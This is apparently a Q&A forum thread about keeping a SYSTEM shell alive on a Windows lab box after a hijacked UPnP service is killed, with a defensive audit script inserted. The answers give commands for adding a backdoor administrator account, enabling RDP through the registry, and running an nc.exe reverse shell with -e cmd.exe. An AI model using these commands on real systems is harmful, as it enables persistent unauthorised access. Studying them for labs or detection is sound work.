6

I have a user-restricted shell and I used a host upnp exploit which gives me root access to nc.exe. I am able to get a shell as SYSTEM but it dies after 30 seconds due to the service being unrecognised and then terminates. Within this time, what can I do to get back another system shell?

I've tried adding another user as admin but do not know how to switch to that user. I also want to avoid making my current user an admin as other people are attacking the same box.

I can use meterpreter to migrate to another process, but I would like to do this more manually and am looking for a simpler solution.

Anderson
  • 475
  • 6
  • 12
  • This seems difficult to answer knowing little about the scenario. But if you want to maintain access can’t you install some permanent backdoor when you’re on to allow you to gain access using that instead? Again I don’t know the scenario but that seems a logical next step. – ISMSDEV Oct 25 '17 at 20:16
  • Kill the thing that kills services? – billc.cn Nov 01 '17 at 18:30

2 Answers

5

If I'm reading this correctly, you changed a Windows service, UPNPHost, to use a different executable than it shipped with, right? If so, the process dies because it doesn't respond correctly to the task host, so it gets killed by the system.

I've tried adding another user as admin but do not know how to switch to that user.

You can switch using Remote Desktop. Anything that gets spawned by nc.exe will likely be killed immediately alongside it.

I presume this is how you added the new user as admin?

net user anderson cooper /add && net localgroup administrators anderson /add

Method 1: Remote Desktop

Try to RDP into the machine with the username anderson, and the password cooper. If RDP is not open, enable it:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Method 2: Meterpreter Migration

Alternatively, you can upload a meterpreter shell and use that instead of plain nc, and then quickly migrate to another process so the shell continues to operate.

Mark Buffalo
  • 22,498
  • 8
  • 74
  • 91
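A defender-side check for the traces the two methods above leave on the host (a service image path pointing at nc.exe, fDenyTSConnections set to 0, an extra member of Administrators, and the Service Control Manager events logged when the replaced service is killed), added here as an example and not code from either answer; it assumes a modern Windows host with PowerShell 5.1, an elevated session, and a placeholder admin baseline in `$ExpectedAdmins`.

```powershell
# Added audit script, not code from the thread: it looks for the host-side traces
# of what the answers describe. Assumes Windows 10/Server 2016+ with PowerShell 5.1
# (Get-LocalGroupMember, Get-WinEvent); run elevated. $ExpectedAdmins is a placeholder.
function Invoke-ServiceShellAudit {
    param([string[]]$ExpectedAdmins = @('Administrator'))   # placeholder baseline
    $findings = @()

    # 1. Service binary replaced: nc.exe as a service image, or the thread's
    #    upnphost service pointing outside the Windows directory.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        if ($path -match '\\nc(64)?\.exe' -or
            ($svc.Name -eq 'upnphost' -and $path -notmatch '^"?(%SystemRoot%|C:\\Windows\\)')) {
            $findings += "Service '$($svc.Name)' has unexpected image path: $path"
        }
    }

    # 2. RDP enabled through the registry value used in the answer.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $ts  = Get-ItemProperty -Path $key -Name fDenyTSConnections -ErrorAction SilentlyContinue
    if ($ts -and $ts.fDenyTSConnections -eq 0) {
        $findings += 'fDenyTSConnections = 0: Remote Desktop is enabled'
    }

    # 3. Local Administrators membership compared with the expected baseline
    #    (a 'net localgroup administrators ... /add' shows up here).
    $members = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        $account = ($m.Name -split '\\')[-1]
        if ($ExpectedAdmins -notcontains $account) {
            $findings += "Unexpected member of Administrators: $($m.Name)"
        }
    }

    # 4. SCM evidence of the 30-second death: 7009 (timeout waiting for the service
    #    to respond), 7000 (failed to start), 7031/7034 (terminated unexpectedly).
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7000, 7009, 7031, 7034 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents 25 -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $firstLine = ($e.Message -split "`r?`n")[0]
        $findings += "SCM event $($e.Id) at $($e.TimeCreated): $firstLine"
    }

    return $findings
}

Invoke-ServiceShellAudit | ForEach-Object { Write-Output $_ }
```

The 30-second lifetime in the question matches the default SCM start timeout (ServicesPipeTimeout, 30000 ms), so event 7009 for the affected service is the most direct indicator to alert on.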
4

I have found on occasion using the reverse shell to execute another nc.exe reverse shell back to your attack box before the service dies keeps the initial service from crashing. Then use the second reverse shell to continue. Hope it works for you, good luck!

countrhack
  • 466
  • 3
  • 7
  • In this situation, it's probably a Windows XP box (given the vulnerability he described). I've tried this in the past as well, and it still killed the other process since it's a child of the parent that gets offed by the system. Not sure it would work in his situation. – Mark Buffalo Oct 25 '17 at 21:47
  • Surprisingly, it works, I could `nc.exe -nv IP PORT -e C:\WINDOWS\System32\cmd.exe` on the SYSTEM shell and it still remained after it died. So definitely worth trying. However, I do prefer the RDP one as it's more reliable and what I was trying to get by creating an administrator – Anderson Oct 25 '17 at 22:18